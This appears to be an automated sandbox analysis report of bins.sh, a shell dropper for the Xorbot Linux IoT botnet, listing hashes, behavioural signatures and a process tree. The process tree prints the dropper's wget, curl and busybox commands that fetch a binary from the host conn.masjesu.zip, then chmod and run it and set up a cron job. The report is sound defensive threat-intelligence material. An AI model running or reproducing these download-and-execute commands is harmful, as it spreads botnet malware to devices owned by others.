Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240729-en
  • resource tags

    arch:armhf, image:debian9-armhf-20240729-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
  • submitted
    28/02/2025, 11:57

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    1c04224c31369b92267e0f914de6faa7

  • SHA1

    a83724c5b8610fae0d070df43be47b501af8c44b

  • SHA256

    27e10f92af7087a71e53ea4397ca1048fae7141974622a595a9fc358c187cd8f

  • SHA512

    f84f0a3d4f25e30aa0b396a8212e44194c1787f5af184c2a20ded76d3b1dc36e52a38c1c8c16ea6d5263807375dbc8fdfc92de6b4f116b68f16650655288b542

  • SSDEEP

    96:YjvjDjZLwsIL8AjnqinuOCaELKCsHA82U99vLv+vuvBGjm9gcSLwsFQMuBSBqBqs:S4H7qAKosvdGrDIF4

Malware Config

Signatures

  • Detects Xorbot 1 IoCs
  • Xorbot

    Xorbot is a Linux botnet and trojan targeting IoT devices.

  • Xorbot family
  • Contacts a large (1461) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Renames itself 1 IoCs
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system.

  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information that may indicate whether the system is a virtual machine.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 4 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 2 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
    • Executes dropped EXE
    PID:660
    • /bin/rm
      /bin/rm bins.sh
      2⤵
      PID:662
    • /usr/bin/wget
      wget http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:666
    • /usr/bin/curl
      curl -O http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
      2⤵
      • Checks CPU configuration
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:682
    • /bin/busybox
      /bin/busybox wget http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
      2⤵
      • System Network Configuration Discovery
      PID:692
    • /bin/chmod
      chmod 777 6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
      2⤵
      • File and Directory Permissions Modification
      PID:708
    • /tmp/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
      ./6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
      2⤵
      • Renames itself
      • Reads runtime system information
      PID:709
      • /bin/sh
        sh -c "crontab -l"
        3⤵
        PID:711
        • /usr/bin/crontab
          crontab -l
          4⤵
          PID:713
      • /bin/sh
        sh -c "crontab -"
        3⤵
        PID:715
        • /usr/bin/crontab
          crontab -
          4⤵
          • Creates/modifies Cron job
          PID:716
    • /bin/rm
      rm 6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
      2⤵
      PID:733
    • /usr/bin/wget
      wget http://conn.masjesu.zip/bins/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq
      2⤵
      • System Network Configuration Discovery
      PID:736

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx

    Filesize

    119KB

    MD5

    1b166b95f9cb4b079ef1b9ec8363ddf3

    SHA1

    0d8eb08add467b3b5474f9b25909297fe7c2839c

    SHA256

    94a19b33124cbbc1c570b3338f4dfbb2bf1a9335a72acf22be02a9bb8a323cc9

    SHA512

    983ae0f399df2a6cf1dd48ba09098964c5dcb55b8bd049bce8e9c2c15dd88336642da64908d93221247a64ce987950b05042b0fac8474b179f0b1f7f0aca6925

  • /var/spool/cron/crontabs/tmp.TmQTub

    Filesize

    210B

    MD5

    7b98ab537f6f845edfbc8620f2fc5d7d

    SHA1

    24813d7bc40bb0b5e462c3deb0a7a63859b5b7e0

    SHA256

    d772d12593450198d104683ce374a3a7130fc147071a9b7e950f61265d0a4a2f

    SHA512

    b9ef53b1061fe7d69fba4bb8af60a1de25a5c48bd321dfa555bff04246f4375ac723f51c97b9ae516400d00fae4ab729845b7d22bf6143926aa3efa222212ec5